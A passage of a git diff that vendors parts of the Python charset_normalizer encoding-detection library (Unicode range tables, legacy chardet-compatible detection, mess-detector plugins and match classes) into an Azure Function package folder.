range(128896, 129023 + 1), + "Supplemental Arrows-C": range(129024, 129279 + 1), + "Supplemental Symbols and Pictographs": range(129280, 129535 + 1), + "CJK Unified Ideographs Extension B": range(131072, 173791 + 1), + "CJK Unified Ideographs Extension C": range(173824, 177983 + 1), + "CJK Unified Ideographs Extension D": range(177984, 178207 + 1), + "CJK Unified Ideographs Extension E": range(178208, 183983 + 1), + "CJK Unified Ideographs Extension F": range(183984, 191471 + 1), + "CJK Compatibility Ideographs Supplement": range(194560, 195103 + 1), + "Tags": range(917504, 917631 + 1), + "Variation Selectors Supplement": range(917760, 917999 + 1), +} + + +UNICODE_SECONDARY_RANGE_KEYWORD: List[str] = [ + "Supplement", + "Extended", + "Extensions", + "Modifier", + "Marks", + "Punctuation", + "Symbols", + "Forms", + "Operators", + "Miscellaneous", + "Drawing", + "Block", + "Shapes", + "Supplemental", + "Tags", +] + +RE_POSSIBLE_ENCODING_INDICATION = re_compile( + r"(?:(?:encoding)|(?:charset)|(?:coding))(?:[\:= ]{1,10})(?:[\"\']?)([a-zA-Z0-9\-_]+)(?:[\"\']?)", + IGNORECASE, +) + +IANA_SUPPORTED: List[str] = sorted( + filter( + lambda x: x.endswith("_codec") is False + and x not in {"rot_13", "tactis", "mbcs"}, + list(set(aliases.values())), + ) +) + +IANA_SUPPORTED_COUNT: int = len(IANA_SUPPORTED) + +# pre-computed code page that are similar using the function cp_similarity. 
+IANA_SUPPORTED_SIMILAR: Dict[str, List[str]] = { + "cp037": ["cp1026", "cp1140", "cp273", "cp500"], + "cp1026": ["cp037", "cp1140", "cp273", "cp500"], + "cp1125": ["cp866"], + "cp1140": ["cp037", "cp1026", "cp273", "cp500"], + "cp1250": ["iso8859_2"], + "cp1251": ["kz1048", "ptcp154"], + "cp1252": ["iso8859_15", "iso8859_9", "latin_1"], + "cp1253": ["iso8859_7"], + "cp1254": ["iso8859_15", "iso8859_9", "latin_1"], + "cp1257": ["iso8859_13"], + "cp273": ["cp037", "cp1026", "cp1140", "cp500"], + "cp437": ["cp850", "cp858", "cp860", "cp861", "cp862", "cp863", "cp865"], + "cp500": ["cp037", "cp1026", "cp1140", "cp273"], + "cp850": ["cp437", "cp857", "cp858", "cp865"], + "cp857": ["cp850", "cp858", "cp865"], + "cp858": ["cp437", "cp850", "cp857", "cp865"], + "cp860": ["cp437", "cp861", "cp862", "cp863", "cp865"], + "cp861": ["cp437", "cp860", "cp862", "cp863", "cp865"], + "cp862": ["cp437", "cp860", "cp861", "cp863", "cp865"], + "cp863": ["cp437", "cp860", "cp861", "cp862", "cp865"], + "cp865": ["cp437", "cp850", "cp857", "cp858", "cp860", "cp861", "cp862", "cp863"], + "cp866": ["cp1125"], + "iso8859_10": ["iso8859_14", "iso8859_15", "iso8859_4", "iso8859_9", "latin_1"], + "iso8859_11": ["tis_620"], + "iso8859_13": ["cp1257"], + "iso8859_14": [ + "iso8859_10", + "iso8859_15", + "iso8859_16", + "iso8859_3", + "iso8859_9", + "latin_1", + ], + "iso8859_15": [ + "cp1252", + "cp1254", + "iso8859_10", + "iso8859_14", + "iso8859_16", + "iso8859_3", + "iso8859_9", + "latin_1", + ], + "iso8859_16": [ + "iso8859_14", + "iso8859_15", + "iso8859_2", + "iso8859_3", + "iso8859_9", + "latin_1", + ], + "iso8859_2": ["cp1250", "iso8859_16", "iso8859_4"], + "iso8859_3": ["iso8859_14", "iso8859_15", "iso8859_16", "iso8859_9", "latin_1"], + "iso8859_4": ["iso8859_10", "iso8859_2", "iso8859_9", "latin_1"], + "iso8859_7": ["cp1253"], + "iso8859_9": [ + "cp1252", + "cp1254", + "cp1258", + "iso8859_10", + "iso8859_14", + "iso8859_15", + "iso8859_16", + "iso8859_3", + "iso8859_4", + "latin_1", + ], + "kz1048": ["cp1251", "ptcp154"], + "latin_1": [ + "cp1252", + "cp1254", + "cp1258", + "iso8859_10", + "iso8859_14", + "iso8859_15", + "iso8859_16", + "iso8859_3", + "iso8859_4", + "iso8859_9", + ], + "mac_iceland": ["mac_roman", "mac_turkish"], + "mac_roman": ["mac_iceland", "mac_turkish"], + "mac_turkish": ["mac_iceland", "mac_roman"], + "ptcp154": ["cp1251", "kz1048"], + "tis_620": ["iso8859_11"], +} + + +CHARDET_CORRESPONDENCE: Dict[str, str] = { + "iso2022_kr": "ISO-2022-KR", + "iso2022_jp": "ISO-2022-JP", + "euc_kr": "EUC-KR", + "tis_620": "TIS-620", + "utf_32": "UTF-32", + "euc_jp": "EUC-JP", + "koi8_r": "KOI8-R", + "iso8859_1": "ISO-8859-1", + "iso8859_2": "ISO-8859-2", + "iso8859_5": "ISO-8859-5", + "iso8859_6": "ISO-8859-6", + "iso8859_7": "ISO-8859-7", + "iso8859_8": "ISO-8859-8", + "utf_16": "UTF-16", + "cp855": "IBM855", + "mac_cyrillic": "MacCyrillic", + "gb2312": "GB2312", + "gb18030": "GB18030", + "cp932": "CP932", + "cp866": "IBM866", + "utf_8": "utf-8", + "utf_8_sig": "UTF-8-SIG", + "shift_jis": "SHIFT_JIS", + "big5": "Big5", + "cp1250": "windows-1250", + "cp1251": "windows-1251", + "cp1252": "Windows-1252", + "cp1253": "windows-1253", + "cp1255": "windows-1255", + "cp1256": "windows-1256", + "cp1254": "Windows-1254", + "cp949": "CP949", +} + + +COMMON_SAFE_ASCII_CHARACTERS: Set[str] = { + "<", + ">", + "=", + ":", + "/", + "&", + ";", + "{", + "}", + "[", + "]", + ",", + "|", + '"', + "-", +} + + +KO_NAMES: Set[str] = {"johab", "cp949", "euc_kr"} +ZH_NAMES: Set[str] = {"big5", "cp950", "big5hkscs", "hz"} 
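+# KO_NAMES/ZH_NAMES group codec names specific to Korean and Chinese text.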
+ +NOT_PRINTABLE_PATTERN = re_compile(r"[0-9\W\n\r\t]+") + +LANGUAGE_SUPPORTED_COUNT: int = len(FREQUENCIES) + +# Logging LEVEL bellow DEBUG +TRACE: int = 5 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/legacy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/legacy.py new file mode 100644 index 0000000..e97e27c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/legacy.py @@ -0,0 +1,95 @@ +import warnings +from typing import Dict, Optional, Union + +from .api import from_bytes, from_fp, from_path, normalize +from .constant import CHARDET_CORRESPONDENCE +from .models import CharsetMatch, CharsetMatches + + +def detect(byte_str: bytes) -> Dict[str, Optional[Union[str, float]]]: + """ + chardet legacy method + Detect the encoding of the given byte string. It should be mostly backward-compatible. + Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it) + This function is deprecated and should be used to migrate your project easily, consult the documentation for + further information. Not planned for removal. + + :param byte_str: The byte sequence to examine. + """ + if not isinstance(byte_str, (bytearray, bytes)): + raise TypeError( # pragma: nocover + "Expected object of type bytes or bytearray, got: " + "{0}".format(type(byte_str)) + ) + + if isinstance(byte_str, bytearray): + byte_str = bytes(byte_str) + + r = from_bytes(byte_str).best() + + encoding = r.encoding if r is not None else None + language = r.language if r is not None and r.language != "Unknown" else "" + confidence = 1.0 - r.chaos if r is not None else None + + # Note: CharsetNormalizer does not return 'UTF-8-SIG' as the sig get stripped in the detection/normalization process + # but chardet does return 'utf-8-sig' and it is a valid codec name. 
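+ # Appending "_sig" keeps the codec name chardet users expect for a BOM-prefixed UTF-8 payload.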
+ if r is not None and encoding == "utf_8" and r.bom: + encoding += "_sig" + + return { + "encoding": encoding + if encoding not in CHARDET_CORRESPONDENCE + else CHARDET_CORRESPONDENCE[encoding], + "language": language, + "confidence": confidence, + } + + +class CharsetNormalizerMatch(CharsetMatch): + pass + + +class CharsetNormalizerMatches(CharsetMatches): + @staticmethod + def from_fp(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return from_fp(*args, **kwargs) # pragma: nocover + + @staticmethod + def from_bytes(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return from_bytes(*args, **kwargs) # pragma: nocover + + @staticmethod + def from_path(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return from_path(*args, **kwargs) # pragma: nocover + + @staticmethod + def normalize(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return normalize(*args, **kwargs) # pragma: nocover + + +class CharsetDetector(CharsetNormalizerMatches): + pass + + +class CharsetDoctor(CharsetNormalizerMatches): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/md.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/md.py new file mode 100644 index 0000000..6f52ed7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/md.py @@ -0,0 +1,553 @@ +from functools import lru_cache +from typing import List, Optional + +from .constant import COMMON_SAFE_ASCII_CHARACTERS, UNICODE_SECONDARY_RANGE_KEYWORD +from .utils import ( + is_accentuated, + is_ascii, + is_case_variable, + is_cjk, + is_emoticon, + is_hangul, + is_hiragana, + is_katakana, + is_latin, + is_punctuation, + is_separator, + is_symbol, + is_thai, + is_unprintable, + remove_accent, + unicode_range, +) + + +class MessDetectorPlugin: + """ + Base abstract class used for mess detection plugins. + All detectors MUST extend and implement given methods. + """ + + def eligible(self, character: str) -> bool: + """ + Determine if given character should be fed in. + """ + raise NotImplementedError # pragma: nocover + + def feed(self, character: str) -> None: + """ + The main routine to be executed upon character. + Insert the logic in witch the text would be considered chaotic. + """ + raise NotImplementedError # pragma: nocover + + def reset(self) -> None: # pragma: no cover + """ + Permit to reset the plugin to the initial state. + """ + raise NotImplementedError + + @property + def ratio(self) -> float: + """ + Compute the chaos ratio based on what your feed() has seen. + Must NOT be lower than 0.; No restriction gt 0. 
+ """ + raise NotImplementedError # pragma: nocover + + +class TooManySymbolOrPunctuationPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._punctuation_count: int = 0 + self._symbol_count: int = 0 + self._character_count: int = 0 + + self._last_printable_char: Optional[str] = None + self._frenzy_symbol_in_word: bool = False + + def eligible(self, character: str) -> bool: + return character.isprintable() + + def feed(self, character: str) -> None: + self._character_count += 1 + + if ( + character != self._last_printable_char + and character not in COMMON_SAFE_ASCII_CHARACTERS + ): + if is_punctuation(character): + self._punctuation_count += 1 + elif ( + character.isdigit() is False + and is_symbol(character) + and is_emoticon(character) is False + ): + self._symbol_count += 2 + + self._last_printable_char = character + + def reset(self) -> None: # pragma: no cover + self._punctuation_count = 0 + self._character_count = 0 + self._symbol_count = 0 + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + ratio_of_punctuation: float = ( + self._punctuation_count + self._symbol_count + ) / self._character_count + + return ratio_of_punctuation if ratio_of_punctuation >= 0.3 else 0.0 + + +class TooManyAccentuatedPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._character_count: int = 0 + self._accentuated_count: int = 0 + + def eligible(self, character: str) -> bool: + return character.isalpha() + + def feed(self, character: str) -> None: + self._character_count += 1 + + if is_accentuated(character): + self._accentuated_count += 1 + + def reset(self) -> None: # pragma: no cover + self._character_count = 0 + self._accentuated_count = 0 + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + ratio_of_accentuation: float = self._accentuated_count / self._character_count + return ratio_of_accentuation if ratio_of_accentuation >= 0.35 else 0.0 + + +class UnprintablePlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._unprintable_count: int = 0 + self._character_count: int = 0 + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + if is_unprintable(character): + self._unprintable_count += 1 + self._character_count += 1 + + def reset(self) -> None: # pragma: no cover + self._unprintable_count = 0 + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + return (self._unprintable_count * 8) / self._character_count + + +class SuspiciousDuplicateAccentPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._successive_count: int = 0 + self._character_count: int = 0 + + self._last_latin_character: Optional[str] = None + + def eligible(self, character: str) -> bool: + return character.isalpha() and is_latin(character) + + def feed(self, character: str) -> None: + self._character_count += 1 + if ( + self._last_latin_character is not None + and is_accentuated(character) + and is_accentuated(self._last_latin_character) + ): + if character.isupper() and self._last_latin_character.isupper(): + self._successive_count += 1 + # Worse if its the same char duplicated with different accent. 
+ if remove_accent(character) == remove_accent(self._last_latin_character): + self._successive_count += 1 + self._last_latin_character = character + + def reset(self) -> None: # pragma: no cover + self._successive_count = 0 + self._character_count = 0 + self._last_latin_character = None + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + return (self._successive_count * 2) / self._character_count + + +class SuspiciousRange(MessDetectorPlugin): + def __init__(self) -> None: + self._suspicious_successive_range_count: int = 0 + self._character_count: int = 0 + self._last_printable_seen: Optional[str] = None + + def eligible(self, character: str) -> bool: + return character.isprintable() + + def feed(self, character: str) -> None: + self._character_count += 1 + + if ( + character.isspace() + or is_punctuation(character) + or character in COMMON_SAFE_ASCII_CHARACTERS + ): + self._last_printable_seen = None + return + + if self._last_printable_seen is None: + self._last_printable_seen = character + return + + unicode_range_a: Optional[str] = unicode_range(self._last_printable_seen) + unicode_range_b: Optional[str] = unicode_range(character) + + if is_suspiciously_successive_range(unicode_range_a, unicode_range_b): + self._suspicious_successive_range_count += 1 + + self._last_printable_seen = character + + def reset(self) -> None: # pragma: no cover + self._character_count = 0 + self._suspicious_successive_range_count = 0 + self._last_printable_seen = None + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + ratio_of_suspicious_range_usage: float = ( + self._suspicious_successive_range_count * 2 + ) / self._character_count + + if ratio_of_suspicious_range_usage < 0.1: + return 0.0 + + return ratio_of_suspicious_range_usage + + +class SuperWeirdWordPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._word_count: int = 0 + self._bad_word_count: int = 0 + self._foreign_long_count: int = 0 + + self._is_current_word_bad: bool = False + self._foreign_long_watch: bool = False + + self._character_count: int = 0 + self._bad_character_count: int = 0 + + self._buffer: str = "" + self._buffer_accent_count: int = 0 + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + if character.isalpha(): + self._buffer += character + if is_accentuated(character): + self._buffer_accent_count += 1 + if ( + self._foreign_long_watch is False + and (is_latin(character) is False or is_accentuated(character)) + and is_cjk(character) is False + and is_hangul(character) is False + and is_katakana(character) is False + and is_hiragana(character) is False + and is_thai(character) is False + ): + self._foreign_long_watch = True + return + if not self._buffer: + return + if ( + character.isspace() or is_punctuation(character) or is_separator(character) + ) and self._buffer: + self._word_count += 1 + buffer_length: int = len(self._buffer) + + self._character_count += buffer_length + + if buffer_length >= 4: + if self._buffer_accent_count / buffer_length > 0.34: + self._is_current_word_bad = True + # Word/Buffer ending with a upper case accentuated letter are so rare, + # that we will consider them all as suspicious. Same weight as foreign_long suspicious. 
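+ # (a word ending in an upper-case accent like "É" or "Ã" typically betrays a mis-decoded byte sequence)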
+ if is_accentuated(self._buffer[-1]) and self._buffer[-1].isupper(): + self._foreign_long_count += 1 + self._is_current_word_bad = True + if buffer_length >= 24 and self._foreign_long_watch: + self._foreign_long_count += 1 + self._is_current_word_bad = True + + if self._is_current_word_bad: + self._bad_word_count += 1 + self._bad_character_count += len(self._buffer) + self._is_current_word_bad = False + + self._foreign_long_watch = False + self._buffer = "" + self._buffer_accent_count = 0 + elif ( + character not in {"<", ">", "-", "=", "~", "|", "_"} + and character.isdigit() is False + and is_symbol(character) + ): + self._is_current_word_bad = True + self._buffer += character + + def reset(self) -> None: # pragma: no cover + self._buffer = "" + self._is_current_word_bad = False + self._foreign_long_watch = False + self._bad_word_count = 0 + self._word_count = 0 + self._character_count = 0 + self._bad_character_count = 0 + self._foreign_long_count = 0 + + @property + def ratio(self) -> float: + if self._word_count <= 10 and self._foreign_long_count == 0: + return 0.0 + + return self._bad_character_count / self._character_count + + +class CjkInvalidStopPlugin(MessDetectorPlugin): + """ + GB(Chinese) based encoding often render the stop incorrectly when the content does not fit and + can be easily detected. Searching for the overuse of '丅' and '丄'. + """ + + def __init__(self) -> None: + self._wrong_stop_count: int = 0 + self._cjk_character_count: int = 0 + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + if character in {"丅", "丄"}: + self._wrong_stop_count += 1 + return + if is_cjk(character): + self._cjk_character_count += 1 + + def reset(self) -> None: # pragma: no cover + self._wrong_stop_count = 0 + self._cjk_character_count = 0 + + @property + def ratio(self) -> float: + if self._cjk_character_count < 16: + return 0.0 + return self._wrong_stop_count / self._cjk_character_count + + +class ArchaicUpperLowerPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._buf: bool = False + + self._character_count_since_last_sep: int = 0 + + self._successive_upper_lower_count: int = 0 + self._successive_upper_lower_count_final: int = 0 + + self._character_count: int = 0 + + self._last_alpha_seen: Optional[str] = None + self._current_ascii_only: bool = True + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + is_concerned = character.isalpha() and is_case_variable(character) + chunk_sep = is_concerned is False + + if chunk_sep and self._character_count_since_last_sep > 0: + if ( + self._character_count_since_last_sep <= 64 + and character.isdigit() is False + and self._current_ascii_only is False + ): + self._successive_upper_lower_count_final += ( + self._successive_upper_lower_count + ) + + self._successive_upper_lower_count = 0 + self._character_count_since_last_sep = 0 + self._last_alpha_seen = None + self._buf = False + self._character_count += 1 + self._current_ascii_only = True + + return + + if self._current_ascii_only is True and is_ascii(character) is False: + self._current_ascii_only = False + + if self._last_alpha_seen is not None: + if (character.isupper() and self._last_alpha_seen.islower()) or ( + character.islower() and self._last_alpha_seen.isupper() + ): + if self._buf is True: + self._successive_upper_lower_count += 2 + self._buf = False + else: + self._buf = True + else: + self._buf = False + + self._character_count += 1 + 
self._character_count_since_last_sep += 1 + self._last_alpha_seen = character + + def reset(self) -> None: # pragma: no cover + self._character_count = 0 + self._character_count_since_last_sep = 0 + self._successive_upper_lower_count = 0 + self._successive_upper_lower_count_final = 0 + self._last_alpha_seen = None + self._buf = False + self._current_ascii_only = True + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + return self._successive_upper_lower_count_final / self._character_count + + +@lru_cache(maxsize=1024) +def is_suspiciously_successive_range( + unicode_range_a: Optional[str], unicode_range_b: Optional[str] +) -> bool: + """ + Determine if two Unicode range seen next to each other can be considered as suspicious. + """ + if unicode_range_a is None or unicode_range_b is None: + return True + + if unicode_range_a == unicode_range_b: + return False + + if "Latin" in unicode_range_a and "Latin" in unicode_range_b: + return False + + if "Emoticons" in unicode_range_a or "Emoticons" in unicode_range_b: + return False + + # Latin characters can be accompanied with a combining diacritical mark + # eg. Vietnamese. + if ("Latin" in unicode_range_a or "Latin" in unicode_range_b) and ( + "Combining" in unicode_range_a or "Combining" in unicode_range_b + ): + return False + + keywords_range_a, keywords_range_b = unicode_range_a.split( + " " + ), unicode_range_b.split(" ") + + for el in keywords_range_a: + if el in UNICODE_SECONDARY_RANGE_KEYWORD: + continue + if el in keywords_range_b: + return False + + # Japanese Exception + range_a_jp_chars, range_b_jp_chars = ( + unicode_range_a + in ( + "Hiragana", + "Katakana", + ), + unicode_range_b in ("Hiragana", "Katakana"), + ) + if (range_a_jp_chars or range_b_jp_chars) and ( + "CJK" in unicode_range_a or "CJK" in unicode_range_b + ): + return False + if range_a_jp_chars and range_b_jp_chars: + return False + + if "Hangul" in unicode_range_a or "Hangul" in unicode_range_b: + if "CJK" in unicode_range_a or "CJK" in unicode_range_b: + return False + if unicode_range_a == "Basic Latin" or unicode_range_b == "Basic Latin": + return False + + # Chinese/Japanese use dedicated range for punctuation and/or separators. + if ("CJK" in unicode_range_a or "CJK" in unicode_range_b) or ( + unicode_range_a in ["Katakana", "Hiragana"] + and unicode_range_b in ["Katakana", "Hiragana"] + ): + if "Punctuation" in unicode_range_a or "Punctuation" in unicode_range_b: + return False + if "Forms" in unicode_range_a or "Forms" in unicode_range_b: + return False + + return True + + +@lru_cache(maxsize=2048) +def mess_ratio( + decoded_sequence: str, maximum_threshold: float = 0.2, debug: bool = False +) -> float: + """ + Compute a mess ratio given a decoded bytes sequence. The maximum threshold does stop the computation earlier. 
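+ The score is the sum of every MessDetectorPlugin subclass ratio, recomputed at fixed intervals.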
+ """ + + detectors: List[MessDetectorPlugin] = [ + md_class() for md_class in MessDetectorPlugin.__subclasses__() + ] + + length: int = len(decoded_sequence) + 1 + + mean_mess_ratio: float = 0.0 + + if length < 512: + intermediary_mean_mess_ratio_calc: int = 32 + elif length <= 1024: + intermediary_mean_mess_ratio_calc = 64 + else: + intermediary_mean_mess_ratio_calc = 128 + + for character, index in zip(decoded_sequence + "\n", range(length)): + for detector in detectors: + if detector.eligible(character): + detector.feed(character) + + if ( + index > 0 and index % intermediary_mean_mess_ratio_calc == 0 + ) or index == length - 1: + mean_mess_ratio = sum(dt.ratio for dt in detectors) + + if mean_mess_ratio >= maximum_threshold: + break + + if debug: + for dt in detectors: # pragma: nocover + print(dt.__class__, dt.ratio) + + return round(mean_mess_ratio, 3) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/models.py new file mode 100644 index 0000000..55f6d0d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/models.py @@ -0,0 +1,392 @@ +import warnings +from collections import Counter +from encodings.aliases import aliases +from hashlib import sha256 +from json import dumps +from re import sub +from typing import Any, Dict, Iterator, List, Optional, Tuple, Union + +from .constant import NOT_PRINTABLE_PATTERN, TOO_BIG_SEQUENCE +from .md import mess_ratio +from .utils import iana_name, is_multi_byte_encoding, unicode_range + + +class CharsetMatch: + def __init__( + self, + payload: bytes, + guessed_encoding: str, + mean_mess_ratio: float, + has_sig_or_bom: bool, + languages: "CoherenceMatches", + decoded_payload: Optional[str] = None, + ): + self._payload: bytes = payload + + self._encoding: str = guessed_encoding + self._mean_mess_ratio: float = mean_mess_ratio + self._languages: CoherenceMatches = languages + self._has_sig_or_bom: bool = has_sig_or_bom + self._unicode_ranges: Optional[List[str]] = None + + self._leaves: List[CharsetMatch] = [] + self._mean_coherence_ratio: float = 0.0 + + self._output_payload: Optional[bytes] = None + self._output_encoding: Optional[str] = None + + self._string: Optional[str] = decoded_payload + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CharsetMatch): + raise TypeError( + "__eq__ cannot be invoked on {} and {}.".format( + str(other.__class__), str(self.__class__) + ) + ) + return self.encoding == other.encoding and self.fingerprint == other.fingerprint + + def __lt__(self, other: object) -> bool: + """ + Implemented to make sorted available upon CharsetMatches items. + """ + if not isinstance(other, CharsetMatch): + raise ValueError + + chaos_difference: float = abs(self.chaos - other.chaos) + coherence_difference: float = abs(self.coherence - other.coherence) + + # Bellow 1% difference --> Use Coherence + if chaos_difference < 0.01 and coherence_difference > 0.02: + # When having a tough decision, use the result that decoded as many multi-byte as possible. 
+ if chaos_difference == 0.0 and self.coherence == other.coherence: + return self.multi_byte_usage > other.multi_byte_usage + return self.coherence > other.coherence + + return self.chaos < other.chaos + + @property + def multi_byte_usage(self) -> float: + return 1.0 - len(str(self)) / len(self.raw) + + @property + def chaos_secondary_pass(self) -> float: + """ + Check once again chaos in decoded text, except this time, with full content. + Use with caution, this can be very slow. + Notice: Will be removed in 3.0 + """ + warnings.warn( + "chaos_secondary_pass is deprecated and will be removed in 3.0", + DeprecationWarning, + ) + return mess_ratio(str(self), 1.0) + + @property + def coherence_non_latin(self) -> float: + """ + Coherence ratio on the first non-latin language detected if ANY. + Notice: Will be removed in 3.0 + """ + warnings.warn( + "coherence_non_latin is deprecated and will be removed in 3.0", + DeprecationWarning, + ) + return 0.0 + + @property + def w_counter(self) -> Counter: + """ + Word counter instance on decoded text. + Notice: Will be removed in 3.0 + """ + warnings.warn( + "w_counter is deprecated and will be removed in 3.0", DeprecationWarning + ) + + string_printable_only = sub(NOT_PRINTABLE_PATTERN, " ", str(self).lower()) + + return Counter(string_printable_only.split()) + + def __str__(self) -> str: + # Lazy Str Loading + if self._string is None: + self._string = str(self._payload, self._encoding, "strict") + return self._string + + def __repr__(self) -> str: + return "".format(self.encoding, self.fingerprint) + + def add_submatch(self, other: "CharsetMatch") -> None: + if not isinstance(other, CharsetMatch) or other == self: + raise ValueError( + "Unable to add instance <{}> as a submatch of a CharsetMatch".format( + other.__class__ + ) + ) + + other._string = None # Unload RAM usage; dirty trick. + self._leaves.append(other) + + @property + def encoding(self) -> str: + return self._encoding + + @property + def encoding_aliases(self) -> List[str]: + """ + Encoding name are known by many name, using this could help when searching for IBM855 when it's listed as CP855. + """ + also_known_as: List[str] = [] + for u, p in aliases.items(): + if self.encoding == u: + also_known_as.append(p) + elif self.encoding == p: + also_known_as.append(u) + return also_known_as + + @property + def bom(self) -> bool: + return self._has_sig_or_bom + + @property + def byte_order_mark(self) -> bool: + return self._has_sig_or_bom + + @property + def languages(self) -> List[str]: + """ + Return the complete list of possible languages found in decoded sequence. + Usually not really useful. Returned list may be empty even if 'language' property return something != 'Unknown'. + """ + return [e[0] for e in self._languages] + + @property + def language(self) -> str: + """ + Most probable language found in decoded sequence. If none were detected or inferred, the property will return + "Unknown". + """ + if not self._languages: + # Trying to infer the language based on the given encoding + # Its either English or we should not pronounce ourselves in certain cases. 
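+ # could_be_from_charset contains this match's own encoding plus every submatch encoding.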
+ if "ascii" in self.could_be_from_charset: + return "English" + + # doing it there to avoid circular import + from charset_normalizer.cd import encoding_languages, mb_encoding_languages + + languages = ( + mb_encoding_languages(self.encoding) + if is_multi_byte_encoding(self.encoding) + else encoding_languages(self.encoding) + ) + + if len(languages) == 0 or "Latin Based" in languages: + return "Unknown" + + return languages[0] + + return self._languages[0][0] + + @property + def chaos(self) -> float: + return self._mean_mess_ratio + + @property + def coherence(self) -> float: + if not self._languages: + return 0.0 + return self._languages[0][1] + + @property + def percent_chaos(self) -> float: + return round(self.chaos * 100, ndigits=3) + + @property + def percent_coherence(self) -> float: + return round(self.coherence * 100, ndigits=3) + + @property + def raw(self) -> bytes: + """ + Original untouched bytes. + """ + return self._payload + + @property + def submatch(self) -> List["CharsetMatch"]: + return self._leaves + + @property + def has_submatch(self) -> bool: + return len(self._leaves) > 0 + + @property + def alphabets(self) -> List[str]: + if self._unicode_ranges is not None: + return self._unicode_ranges + # list detected ranges + detected_ranges: List[Optional[str]] = [ + unicode_range(char) for char in str(self) + ] + # filter and sort + self._unicode_ranges = sorted(list({r for r in detected_ranges if r})) + return self._unicode_ranges + + @property + def could_be_from_charset(self) -> List[str]: + """ + The complete list of encoding that output the exact SAME str result and therefore could be the originating + encoding. + This list does include the encoding available in property 'encoding'. + """ + return [self._encoding] + [m.encoding for m in self._leaves] + + def first(self) -> "CharsetMatch": + """ + Kept for BC reasons. Will be removed in 3.0. + """ + return self + + def best(self) -> "CharsetMatch": + """ + Kept for BC reasons. Will be removed in 3.0. + """ + return self + + def output(self, encoding: str = "utf_8") -> bytes: + """ + Method to get re-encoded bytes payload using given target encoding. Default to UTF-8. + Any errors will be simply ignored by the encoder NOT replaced. + """ + if self._output_encoding is None or self._output_encoding != encoding: + self._output_encoding = encoding + self._output_payload = str(self).encode(encoding, "replace") + + return self._output_payload # type: ignore + + @property + def fingerprint(self) -> str: + """ + Retrieve the unique SHA256 computed using the transformed (re-encoded) payload. Not the original one. + """ + return sha256(self.output()).hexdigest() + + +class CharsetMatches: + """ + Container with every CharsetMatch items ordered by default from most probable to the less one. + Act like a list(iterable) but does not implements all related methods. + """ + + def __init__(self, results: List[CharsetMatch] = None): + self._results: List[CharsetMatch] = sorted(results) if results else [] + + def __iter__(self) -> Iterator[CharsetMatch]: + yield from self._results + + def __getitem__(self, item: Union[int, str]) -> CharsetMatch: + """ + Retrieve a single item either by its position or encoding name (alias may be used here). + Raise KeyError upon invalid index or encoding not present in results. 
+ """ + if isinstance(item, int): + return self._results[item] + if isinstance(item, str): + item = iana_name(item, False) + for result in self._results: + if item in result.could_be_from_charset: + return result + raise KeyError + + def __len__(self) -> int: + return len(self._results) + + def __bool__(self) -> bool: + return len(self._results) > 0 + + def append(self, item: CharsetMatch) -> None: + """ + Insert a single match. Will be inserted accordingly to preserve sort. + Can be inserted as a submatch. + """ + if not isinstance(item, CharsetMatch): + raise ValueError( + "Cannot append instance '{}' to CharsetMatches".format( + str(item.__class__) + ) + ) + # We should disable the submatch factoring when the input file is too heavy (conserve RAM usage) + if len(item.raw) <= TOO_BIG_SEQUENCE: + for match in self._results: + if match.fingerprint == item.fingerprint and match.chaos == item.chaos: + match.add_submatch(item) + return + self._results.append(item) + self._results = sorted(self._results) + + def best(self) -> Optional["CharsetMatch"]: + """ + Simply return the first match. Strict equivalent to matches[0]. + """ + if not self._results: + return None + return self._results[0] + + def first(self) -> Optional["CharsetMatch"]: + """ + Redundant method, call the method best(). Kept for BC reasons. + """ + return self.best() + + +CoherenceMatch = Tuple[str, float] +CoherenceMatches = List[CoherenceMatch] + + +class CliDetectionResult: + def __init__( + self, + path: str, + encoding: Optional[str], + encoding_aliases: List[str], + alternative_encodings: List[str], + language: str, + alphabets: List[str], + has_sig_or_bom: bool, + chaos: float, + coherence: float, + unicode_path: Optional[str], + is_preferred: bool, + ): + self.path: str = path + self.unicode_path: Optional[str] = 